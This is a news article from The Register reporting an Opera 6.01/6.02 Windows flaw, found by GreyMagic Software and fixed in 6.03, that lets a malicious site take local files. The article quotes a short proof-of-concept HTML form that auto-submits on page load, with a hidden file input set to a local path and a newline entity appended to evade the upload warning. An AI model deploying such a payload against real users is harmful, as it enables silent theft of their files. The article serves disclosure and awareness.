The Register® — Biting the hand that feeds IT

Opera vuln gives up local files

Time to upgrade

Free whitepaper – Securing your Microsoft Internet Information Services (MS IIS) web server

A vulnerability in Opera 6.01 and 6.02 for Windows allows a malicious Web site to grab any file off a client's local drive with ease, GreyMagic Software has discovered. That's the bad news. The good news is that affects only Windows, and it's fixed in version 6.03 which is now available for download. Version 6.0 is not affected.

The problem lies in the way Opera handles form submissions involving file transfers via HTTP. Normally, you'll get a dialog thrown at you warning that a file transfer is about to commence. However, in this case it's possible to alter the 'value' attribute to avoid the dialog by making it appear that there are no files to be transferred.

This is accomplished with remarkable ease:

<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm">
<input type="file" name="expFile" value="c:\test.txt&#10;" style="visibility:hidden">
</form>
</body>

The form is then submitted with the requested file. Notice the bit appended to the value statement. That's where the deception occurs. It shouldn't be possible to set the value attribute, but a coding oversight somewhere between Opera 6.0 and 6.0.1 permits it.

GreyMagic has a couple of fun demonstrations linked to its advisory here. ®

Free whitepaper – Securing your Microsoft Internet Information Services (MS IIS) web server

Don’t Miss

HandcuffsFeds: Hospital hacker's 'massive' DDoS averted

Arrest foils 'Devil's Day' scheme

thumbs down teaser 75Buggy 'smart meters' open door to power-grid botnet

Grid-burrowing worm only the beginning

MicrosoftMicrosoft knew of nasty IE bug a year before attacks

Security delayed or security denied?

BlockMaster SafeStickBlockMaster SafeStick hardware-encrypted USB drive

Review Tough enough?